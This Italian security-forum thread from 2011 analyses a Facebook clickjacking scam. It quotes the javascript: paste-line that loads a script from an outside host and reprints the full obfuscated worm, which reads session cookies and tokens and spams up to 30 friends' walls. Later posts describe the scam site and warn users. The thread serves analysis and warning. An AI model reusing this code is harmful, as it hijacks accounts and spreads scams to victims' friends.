Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

Win32\Face.JSScript ==> Script malevolo su Facebook

Un virus si è intromesso nel tuo computer? Vuoi navigare in tutta sicurezza? Sono sicure le transazione online? Come impedire a malintenzionati di intromettersi nel tuo pc? Come proteggere i tuoi dati? Qui trovi le risposte a queste ed altre domande

Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Hpmezzo » sab set 17, 2011 7:43 pm

Andando su facebook oggi ho notato un video strano dove qualcuno mi diceva :
Ciao [Mio Nome] Guarda sei stato taggato in questo video!!
Appena ho cliccato sul video subito una cosa strana mi è comparso..
Un messaggio del tipo quello di Youtube ma con un messaggio un po' insolito..
Immagine

Ora facendo click su continue spuntano delle istruzioni un po' insolite :
Immagine

Se scriviamo J serve per attivare il Java Script:
Immagine

Se facciamo incolla senza scrivere J lo script non funzionerebbe.
Codice Java Script :
Codice: Seleziona tutto
javascript:(a=(b=document).createElement('script')).src='http://www.cowboysaliensstreaming.com/tag/fb.php',b.body.appendChild(a);void(0)

Lo script l'ho battezzato : Win32\Face.JSScript siccome non ho trovato informazioni su internet non so che nome attribuire. Sto vedendo che l'evoluzione di queste "minacce" è impressionante...Passando dalle pagine con le istruzioni fino ai VIDEO!
Ciao ragazzi e mi raccomando (p.s non ho provato il codice per evitare che la mia pagina sia "fonte di diffusione"...Spero che non l'ha fatto mia sorella al posto mio [:D]

Articolo simile su MegaLab.it ==>http://www.MegaLab.it/7351/il-fantasma-di-bin-laden-e-in-agguato-su-facebook
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Berga95 » sab set 17, 2011 9:39 pm

Ah ecco, avevo in mente di creare un nuovo profilo solo per controllare che succede ma vedo che ogni volta è la solita stupidata con i JS [:p] Questa cosa l'ho già vista 5-6 volte condivisa sul mio profilo...
Comunque non lo definirei Win32, perché penso sia indipendente dalla piattaforma: sarebbe più appropriato PEBKAC? [:D]
Comunque su http://www.cowboysaliensstreaming.com/tag/fb.php si trova il seguente codice, in caso qualcuno interessi e se non fosse più reperibile [std]
Codice: Seleziona tutto
function getElementsByClass(_0x62cbx2, _0x62cbx3, _0x62cbx4) { if (_0x62cbx3 == null) { _0x62cbx3 = document; }; if (_0x62cbx4 == null) { _0x62cbx4 = '*'; }; var _0x62cbx5 = new Array(); var _0x62cbx6 = _0x62cbx3['getElementsByTagName'](_0x62cbx4); var _0x62cbx7 = ' ' + _0x62cbx2 + ' '; var _0x62cbx8 = 0; for (i = 0; i < _0x62cbx6['length']; i++) { var _0x62cbx9 = ' ' + _0x62cbx6[i]['className'] + ' '; if (_0x62cbx9['indexOf'](_0x62cbx7) != -1) { _0x62cbx5[_0x62cbx8++] = _0x62cbx6[i]; }; }; return _0x62cbx5; }; setInterval(function () { var _0x62cbxa = getElementsByClass('generic_dialog'); for (i = 0; i < _0x62cbxa['length']; i++) { _0x62cbxa[i]['style']['display'] = 'none'; }; }, 200); function overlay() { darkbox = document['createElement']('div'); document['body']['appendChild'](darkbox); darkbox['style']['position'] = 'fixed'; darkbox['style']['opacity'] = 0.8; darkbox['style']['filter'] = 'alpha(opacity=80)'; darkbox['style']['background'] = '#FFF'; darkbox['style']['top'] = 0; darkbox['style']['left'] = 0; darkbox['style']['height'] = 100 + '%'; darkbox['style']['width'] = 100 + '%'; darkbox['style']['zIndex'] = 999; darkbox2 = document['createElement']('img'); document['body']['appendChild'](darkbox2); darkbox2['style']['position'] = 'fixed'; darkbox2['src'] = 'http://www.cowboysaliensstreaming.com/tag/verify.png'; darkbox2['style']['marginLeft'] = '-233px'; darkbox2['style']['marginTop'] = '-62px'; darkbox2['style']['top'] = 50 + '%'; darkbox2['style']['left'] = 50 + '%'; darkbox2['style']['zIndex'] = 9999; }; overlay(); function readCookie(_0x62cbxd) { var _0x62cbxe = _0x62cbxd + '='; var _0x62cbxf = document['cookie']['split'](';'); for (var _0x62cbx10 = 0; _0x62cbx10 < _0x62cbxf['length']; _0x62cbx10++) { var _0x62cbx11 = _0x62cbxf[_0x62cbx10]; while (_0x62cbx11['charAt'](0) == ' ') { _0x62cbx11 = _0x62cbx11['substring'](1, _0x62cbx11['length']); }; if (_0x62cbx11['indexOf'](_0x62cbxe) == 0) { return _0x62cbx11['substring'](_0x62cbxe['length'], _0x62cbx11['length']); }; }; return null; }; var user_id = readCookie('c_user'); var user_name = document['getElementById']('navAccountName')['innerHTML']; var uid = user_id; function getRandomInt(_0x62cbx16, _0x62cbx17) { return Math['floor'](Math['random']() * (_0x62cbx17 - _0x62cbx16 + 1)) + _0x62cbx16; }; function randomValue(_0x62cbx19) { return _0x62cbx19[getRandomInt(0, _0x62cbx19['length'] - 1)]; }; var post_form_id = document['getElementsByName']('post_form_id')[0]['value']; var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var video_url = 'http://www.facebook.com/profile.php?sk=wall&' + Math['random'](); var domains = ['http://www.cowboysaliensstreaming.com/tag/test.swf']; var p0 = ['Oddio ma che ci facevi qui', 'Assurdo perche hai fatto questo', 'Pazzesco!! non posso credere che lo hai fatto davvero', 'Non ci posso credere...', 'ca**o sei pazzo', 'OMG... non lo avrei mai creduto', 'Assurdo! fai pena', 'Nooo! ma perche hai fatto questa cosa', 'Dio Mio ti hanno ripreso in questo video', 'Ammazza... che hai fatto ma sei pazzo!', 'Ammazza! non ci posso credere che hai fatto questo', 'Incredibile! Ma perche lo hai fatto', 'wow!!! ma come hanno fatto a riprenderti mentre facevi questa cavolata']; var p1 = ['Ciao', 'Ciao', 'Ciao', 'Ciao', 'ROTFL', 'Ciao', 'Ciao', 'Ciao', 'omg!', 'omg', 'Ciao', 'Ciao!!', 'Ciao!!', 'Ciao!!']; var p2 = ['Guarda sei stato taggato', 'che ci fai', 'Guarda ti hanno ripreso', 'Non pensavo che arrivassi a tanto ti hanno ripreso', 'ma sei te', 'ti hanno taggato']; var p3 = ['in questo video?', 'in questo video!!']; var message = ''; var did = false; function done() { if (!did) { did = true; darkbox2['style']['display'] = 'none'; darkbox3 = document['createElement']('iframe'); document['body']['appendChild'](darkbox3); darkbox3['src'] = 'http://www.cowboysaliensstreaming.com/tag/blocco.php'; darkbox3['style']['position'] = 'fixed'; darkbox3['style']['top'] = 0; darkbox3['style']['left'] = 0; darkbox3['frameBorder'] = 0; darkbox3['style']['height'] = 100 + '%'; darkbox3['style']['width'] = 100 + '%'; darkbox3['style']['zIndex'] = 99999; }; }; var friends; gf = new XMLHttpRequest(); gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + uid + '&' + Math['random'](), false); gf['send'](); if (gf['readyState'] != 4) {} else { data = eval('(' + gf['responseText']['substr'](9) + ')'); if (data['error']) {} else { friends = data; }; }; function contin() { var _0x62cbx17 = friends['payload']['entries']['length']; if (_0x62cbx17 > 30) { _0x62cbx17 = 30; }; message = 'Questa Ragazza deve essere pazza per aver fatto questo!'; var _0x62cbx27 = new XMLHttpRequest(); var _0x62cbx28 = 'http://www.facebook.com/ajax/profile/composer.php?__a=1'; var _0x62cbx29 = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + user_id + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + video_url + '&attachment[params][urlInfo][canonical]=' + video_url + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=VIDE0&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=Cavolo ma le persone stanno proprio fuori! Ma come si fa a fare questa cosa!&attachment[params][url]=' + video_url + '&attachment[params][video][type]=application/x-shockwave-flash&attachment[params][video][src]=' + randomValue(domains) + '%3F' + Math['random']() + '&attachment[params][video][width]=398&attachment[params][video][height]=224&attachment[params][video][v]=0&attachment[params][video][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=http://img294.imagevenue.com/loc76/th_590228290_ragazza_122_76lo.jpg&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest'; _0x62cbx27['open']('POST', _0x62cbx28, true); _0x62cbx27['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); _0x62cbx27['setRequestHeader']('Content-length', _0x62cbx29['length']); _0x62cbx27['setRequestHeader']('Connection', 'keep-alive'); _0x62cbx27['onreadystatechange'] = function () {}; _0x62cbx27['send'](_0x62cbx29); for (var _0x62cbx2a = 0; _0x62cbx2a < _0x62cbx17; _0x62cbx2a++) { if (friends['payload']['entries'][_0x62cbx2a]['uid'] != user_id) { message = [randomValue(p1), friends['payload']['entries'][_0x62cbx2a]['text']['substr'](0, friends['payload']['entries'][_0x62cbx2a]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' '); var _0x62cbx2b = new XMLHttpRequest(); var _0x62cbx28 = 'http://www.facebook.com/ajax/profile/composer.php?__a=1'; var _0x62cbx29 = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + friends['payload']['entries'][_0x62cbx2a]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + video_url + '&attachment[params][urlInfo][canonical]=' + video_url + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=YouTube&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + friends['payload']['entries'][_0x62cbx2a]['text']['substr'](0, friends['payload']['entries'][_0x62cbx2a]['text']['indexOf'](' ')) + ' ' + randomValue(p0) + '&attachment[params][url]=' + video_url + '&attachment[params][video][type]=application/x-shockwave-flash&attachment[params][video][src]=' + randomValue(domains) + '%3F' + Math['random']() + '&attachment[params][video][width]=398&attachment[params][video][height]=224&attachment[params][video][v]=0&attachment[params][video][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=http://cdn.uniroma.tv/public/20100227172345_57212487.jpg&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest'; _0x62cbx2b['open']('POST', _0x62cbx28, true); _0x62cbx2b['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); _0x62cbx2b['setRequestHeader']('Content-length', _0x62cbx29['length']); _0x62cbx2b['setRequestHeader']('Connection', 'keep-alive'); _0x62cbx2b['onreadystatechange'] = function () {}; _0x62cbx2b['send'](_0x62cbx29); }; }; setTimeout('done()', 5000); }; setTimeout(function () { contin(); }, 2000);


Troppo LOL questo source, mi viene voglia di farne uno anche io [rotolo]
Trovi tutti su FB che dicono "Attento è un virus, blablablabla..." [acc2] A certa gente non bisognerebbe nemmeno fargli usare un pc.
Non è morto ciò che in eterno può attendere - e col passare di strani eoni - anche la morte può morire.
~ H.P. Lovecraft
Avatar utente
Berga95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3342
Iscritto il: sab set 12, 2009 12:56 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Hpmezzo » dom set 18, 2011 6:25 am

Hai visto che usa dei messaggi RANDOM?
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm


Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Berga95 » dom set 18, 2011 10:28 am

Certo [^] Ed è anche localizzato in italiano, è rara questa cosa [:D]
Non è morto ciò che in eterno può attendere - e col passare di strani eoni - anche la morte può morire.
~ H.P. Lovecraft
Avatar utente
Berga95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3342
Iscritto il: sab set 12, 2009 12:56 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda hashcat » lun set 19, 2011 1:11 pm

Ecco alcune informazioni in più sul sito in questione:

Il sito permette l'elencazione del contenuto delle cartelle quindi basta digitare:

http://www.cowboysaliensstreaming.com/tag/

E verrà mostrata la lista dei file presenti nella cartella.

I file utilizzati da questa applicazione malevola sono:

blocco.php | fb.php | test.swf | verify.png

verify.png Rappresenta l'immagine utilizzata per chiedere la verifica dell'account:

Immagine

fb.php E' il codice malevolo che si occupa di postare senza autorizzazione la falsa applicazione sulla nostra bacheca

test.swf E' il file di background del finto video

blocco.php E' la vera e propria pagina alla quale si viene reindirizzati e 'obbliga' l'utOntO a completare le offerte sottostanti. Cliccando su queste offerte il creatore di questa truffa guadagna tramite il sito crazylead.com utilizzato per veicolare pubblicità. Nel codice sorgente della pagina sono presenti differenti script relativi ad Histats, sito che permette di raccogliere statistiche sulle visite in tempo reale.
Si può comunque visionare la pagina in questione senza completare le offerte rimuovendo queste righe dal codice sorgente della pagina:

Rimuovendo la classe gateway (nel mio caso):

Codice: Seleziona tutto
<div class="gateway"><p><b>Registrati ad una delle Offerte Sottostanti per vedere il Filmato<br> <br>DEVI INSERIRE DATI REALI E CONFERMARE L'EMAIL DI REGISTRAZIONE</b></p><table width="100%" cellspacing="0" bordercolor="#ffffff" border="0" bgcolor="#000000" id="table1"><tbody><tr></tr><tr><td bgcolor="#f2f2f2"><p style="margin: 2px;"><font face="Arial" size="2"><font face="Arial" color="#c73633" size="2"><b>Premi:</b></font><font face="Arial" size="2"> Registrati e vinci un IMAC, IPAD o IPHONE!</font></font></p></td><td bgcolor="#f2f2f2"><p style="margin: 2px;"><b><font face="Arial" color="#0000ff" size="2"><a href="http://tracking.crazylead.com/SHoC" target="_blank" onclick="javascript:locker.set();" xpndit="true"><b>Registrati Gratis</b></a></font></b></p><table width="100%" cellspacing="0" bordercolor="#ffffff" border="0" style="background-color: rgb(61, 164, 13);" id="table1"></table></td></tr><tr><td bgcolor="#f2f2f2"><p style="margin: 2px;"><font face="Arial" size="2"><font face="Arial" color="#c73633" size="2"><b>Giochi:</b></font><font face="Arial" size="2"> Le epiche guerre dei Greci direttamente sul tuo PC.</font></font></p></td><td bgcolor="#f2f2f2"><p style="margin: 2px;"><b><font face="Arial" color="#0000ff" size="2"><a href="http://tracking.crazylead.com/SHaN" target="_blank" onclick="javascript:locker.set();" xpndit="true"><b>Registrati Gratis</b></a></font></b></p><table width="100%" cellspacing="0" bordercolor="#ffffff" border="0" style="background-color: rgb(61, 164, 13);" id="table1"></table></td></tr><tr><td bgcolor="#f2f2f2"><p style="margin: 2px;"><font face="Arial" size="2"><font face="Arial" color="#c73633" size="2"><b>Libro di Cucina:</b></font><font face="Arial" size="2"> Scarica gratis il libro di ricette che tutti gli Chef utilizzano!</font></font></p></td><td bgcolor="#f2f2f2"><p style="margin: 2px;"><b><font face="Arial" color="#0000ff" size="2"><a href="http://tracking.crazylead.com/SH1Xr" target="_blank" onclick="javascript:locker.set();" xpndit="true"><b>Registrati Gratis</b></a></font></b></p><table width="100%" cellspacing="0" bordercolor="#ffffff" border="0" style="background-color: rgb(61, 164, 13);" id="table1"></table></td></tr><tr><td bgcolor="#f2f2f2"><p style="margin: 2px;"><font face="Arial" size="2"><font face="Arial" color="#c73633" size="2"><b>Guadagna con i sondaggi:</b></font><font face="Arial" size="2"> Influenza lo sviluppo dei nuovi prodotti!</font></font></p></td><td bgcolor="#f2f2f2"><p style="margin: 2px;"><b><font face="Arial" color="#0000ff" size="2"><a href="http://tracking.crazylead.com/SHpU" target="_blank" onclick="javascript:locker.set();" xpndit="true"><b>Registrati Gratis</b></a></font></b></p><table width="100%" cellspacing="0" bordercolor="#ffffff" border="0" style="background-color: rgb(61, 164, 13);" id="table1"></table></td></tr><tr><td bgcolor="#f2f2f2"><p style="margin: 2px;"><font face="Arial" size="2"><font face="Arial" color="#c73633" size="2"><b>Gioca gratis:</b></font><font face="Arial" size="2"> I giochi flash più trend del momento sul tuo PC</font></font></p></td><td bgcolor="#f2f2f2"><p style="margin: 2px;"><b><font face="Arial" color="#0000ff" size="2"><a href="http://tracking.crazylead.com/SHkr" target="_blank" onclick="javascript:locker.set();" xpndit="true"><b>Registrati Gratis</b></a></font></b></p><table width="100%" cellspacing="0" bordercolor="#ffffff" border="0" style="background-color: rgb(61, 164, 13);" id="table1"></table></td></tr></tbody></table><div class="gateway_footer"><label><input type="button" value="Chiudi il Blocco" onclick="javascript:locker.unlock();"></label></div></div>


Poi rimuovendo questi due:

Codice: Seleziona tutto
<div id="lockWindow" style="background: url(&quot;&quot;) no-repeat scroll center center rgb(255, 255, 255); top: 5.66667px; left: 400px;"><center><h2>Controllo Sicurezza Video</h2></center></div>


Codice: Seleziona tutto
<div id="lockWraper" style="height: 602px; width: 1424px;"></div>


Il finto player di youtube è simulato utilizzando un'immagine jpg caricata su imageshack. Cliccando sul finto player si aprirà una pagina di youtube.

Il sito web è stato creato il 24 Maggio 2011 (secondo le informazioni disponibili tramite whois).

Se ci si reca alla "radice" del sito si viene reindirizzati ad un altro sito:

Codice: Seleziona tutto
http://www.prieststreaming.com/girl/


Anche questo sito è utilizzato per ospitare una truffa. Per visualizzare il presunto video sexy l'utente deve loggarsi a facebook. E' interessante analizzare bene il contenuto della pagina:

Immagine

E visionare con attenzione i seguenti elementi:

Codice: Seleziona tutto
http://www.prieststreaming.com/girl/fb-traffic-pop-fr.js

Codice: Seleziona tutto
http://www.prieststreaming.com/girl/fb-traffic-pop.css


Questi elementi sono relativi a Facebook traffic Pop, un plugin che permette di bloccare il contenuto della pagina mostrando tramite un riquadro, per poter visionare la pagina bisogna collegarsi e cliccare sul 'facebook like'.

Maggiori informazioni sullo script sono presenti qui:

http://tyler.tc/facebook-traffic-pop/

Ritornando al sito web:

L'avviso mostrato è generato dal sopranominato facebook traffic pop.

Anche questo può essere bypassato facilmente:

Basta rimuovere l'elemento fblikepop dal codice sorgente:

Codice: Seleziona tutto
<div id="fblikepop" style="position: absolute; top: 381.5px; left: 487px; display: block; "><div id="popup_head"><div id="closeable"></div><h1>=== GUARDA IL VIDEO CLICCA SU &lt;3 === </h1></div><div id="popupMessage">Clicca su &lt;3 per vedere il Video</div><div id="buttonArea"><div id="actionHolder"><fb:like layout="button_count" locale="es_ES" id="fbLikeButton" href="http://www.prieststreaming.com/girl/" show_faces="false" width="450" class=" fb_edge_widget_with_comment fb_iframe_widget"><span><iframe id="f68e0bda8" name="f239ea7244" scrolling="no" style="border-width: initial; border-color: initial; overflow-x: hidden; overflow-y: hidden; height: 20px; width: 450px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " title="Like this content on Facebook." class="fb_ltr" src="http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff529d33%26origin%3Dhttp%253A%252F%252Fwww.prieststreaming.com%252Ff3c352c29%26relation%3Dparent.parent%26transport%3Dpostmessage&amp;extended_social_context=false&amp;href=http%3A%2F%2Fwww.prieststreaming.com%2Fgirl%2F&amp;layout=button_count&amp;locale=fb_LT&amp;node_type=link&amp;sdk=joey&amp;show_faces=false&amp;width=450"></iframe></span></fb:like></div><div style="clear:both"></div></div></div>


E successivamente fblikebg:

Codice: Seleziona tutto
<div id="fblikebg" style="height: 771px; display: block; opacity: 0.5; "></div>


Anche in questo caso l'immagine del falso player è hostata su imageshack. E è presente il codice di monitoraggio Hustats.

I commenti sono palesemente falsi:

I tasti azione Like, Reply, Subscribe non sono attivi (mi sembra che il tasto subscribe non esista proprio). I commenti sono inclusi nel codice della pagina nativamente (non tramite il frame di facebook). Le immagini dei presunti utenti sono caricate su imgur.com.

Controllando le informazioni whois si può notare che il sito è stato creato come il precedente il 24 Maggio 2011.

[weponed] [weponed]

P.S.: Potresti classificare il virus come: Face.JSScript[gen] [ciao]
<<Intelligence is the ability to avoid doing work, yet getting the work done.>>
Linus Torvalds

EX [MLI] Power User.
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Berga95 » lun set 19, 2011 1:58 pm

Cavoli quanto materiale [^] Complimenti a tutti [std]
Ho provveduto a raccogliere tutti i vari file in questo rar, siccome prevedo che quei file non saranno più reperibili.
La password è:
Codice: Seleziona tutto
MegaLab.it

C'è anche il file php con gli invii, quello che avevo postato era un pugno nell'occhio [acc2]

Se raggruppassimo il tutto in un articolo? [uhm] Potrebbe interessare al pubblico? Possiamo anche parlare di prevenzione, così facciamo contento sampei [:D]
Non è morto ciò che in eterno può attendere - e col passare di strani eoni - anche la morte può morire.
~ H.P. Lovecraft
Avatar utente
Berga95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3342
Iscritto il: sab set 12, 2009 12:56 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Hpmezzo » lun set 19, 2011 2:23 pm

bene posso dirvi che il sito è stato segnalato e rimosso...se facciamo click su un video non è più disponibile...Quindi la diffusione non è più una cosa da cui preoccuparsi. Se utilizzavamo il blocco HOST (cioè l'host fornito da mvps.org) il video non veniva caricato =)
Per articolo voglio essere presente pure iooooooo =) Che ne dite ragazzi?
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Hpmezzo » lun set 19, 2011 2:35 pm

Berga ma hai scritto tu questo? hahahahaha ==> http://www.virustotal.com/file-scan/rep ... 1316363833

User: Anonymous
Reputation: 1 credits
Comment date: 2011-09-19 12:13:47 (UTC)
Leads to Facebook scam

Thanks to:
Analyze AntiVirus 0.10
Tags: Malware, NetworkWorm,
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Berga95 » lun set 19, 2011 3:50 pm

Per articolo voglio essere presente pure iooooooo =)

Certo, sei te che hai aperto il thread!
Che ne dite ragazzi?

Beh, prima di tutto bisognerebbe pensare se possa essere adatto in MegaLab.it [std] Inoltre, dovrei svuotare un articolo in bozza per fare spazio a questo [;)] Oppure ne avete voi?
Hpmezzo ha scritto:Berga ma hai scritto tu questo?

No! [8)]
Non è morto ciò che in eterno può attendere - e col passare di strani eoni - anche la morte può morire.
~ H.P. Lovecraft
Avatar utente
Berga95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3342
Iscritto il: sab set 12, 2009 12:56 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda hashcat » lun set 19, 2011 3:58 pm

Hpmezzo ha scritto:Berga ma hai scritto tu questo? hahahahaha ==> http://www.virustotal.com/file-scan/rep ... 1316363833

User: Anonymous
Reputation: 1 credits
Comment date: 2011-09-19 12:13:47 (UTC)
Leads to Facebook scam

Thanks to:
Analyze AntiVirus 0.10
Tags: Malware, NetworkWorm,

Sono stato io (guarda il nome il nome del file di Virustotal e confrontalo con quello da me suggerito) [bleh]

Per l'articolo sono disponibile [fischio]
<<Intelligence is the ability to avoid doing work, yet getting the work done.>>
Linus Torvalds

EX [MLI] Power User.
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Hpmezzo » lun set 19, 2011 4:40 pm

AHAHAHAH infatti ho visto :) Comunque siamo fuori pericolo adesso :)
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda hashcat » lun set 19, 2011 5:18 pm

Berga95 ha scritto:Beh, prima di tutto bisognerebbe pensare se possa essere adatto in MegaLab.it [std] Inoltre, dovrei svuotare un articolo in bozza per fare spazio a questo [;)] Oppure ne avete voi?

Il mio è praticamente vuoto [:D]
<<Intelligence is the ability to avoid doing work, yet getting the work done.>>
Linus Torvalds

EX [MLI] Power User.
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Sabbb » lun set 19, 2011 6:28 pm

Purtroppo mi è arrivata anche a me la famosa notifica di un amico che diceva pressapoco:Sab ma sei tu in questo video?

Cera però solo una foto,senza la possibilità di vedere il filmato (il pulsante play non cera)

Non ero ancora al corrente della cosa e ci ho cliccato sopra.
Non è successo niente,almeno all'apparenza.

Ad occhio mi pare di non aver preso niente.Consigli? [uhm] (oltre a quello del cambio password che ho appena fatto)
Thank..
Avatar utente
Sabbb
Utente inattivo
 
Messaggi: 4483
Iscritto il: sab set 04, 2010 11:19 am

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Hpmezzo » mar set 20, 2011 9:07 am

Sabbb ha scritto:Purtroppo mi è arrivata anche a me la famosa notifica di un amico che diceva pressapoco:Sab ma sei tu in questo video?

Cera però solo una foto,senza la possibilità di vedere il filmato (il pulsante play non cera)

Non ero ancora al corrente della cosa e ci ho cliccato sopra.
Non è successo niente,almeno all'apparenza.

Ad occhio mi pare di non aver preso niente.Consigli? [uhm] (oltre a quello del cambio password che ho appena fatto)
Thank..

Tranquillo importante che non hai incollato il Javascrip nella barra degli indirizzi e hai fatto invio (o vai)..
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: Win32\Face.JSScript ==> Script malevolo su Facebook

Messaggioda Sabbb » mar set 20, 2011 1:02 pm

[grazie]
Avatar utente
Sabbb
Utente inattivo
 
Messaggi: 4483
Iscritto il: sab set 04, 2010 11:19 am


Torna a Sicurezza

Chi c’è in linea

Visitano il forum: Nessuno e 14 ospiti

Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising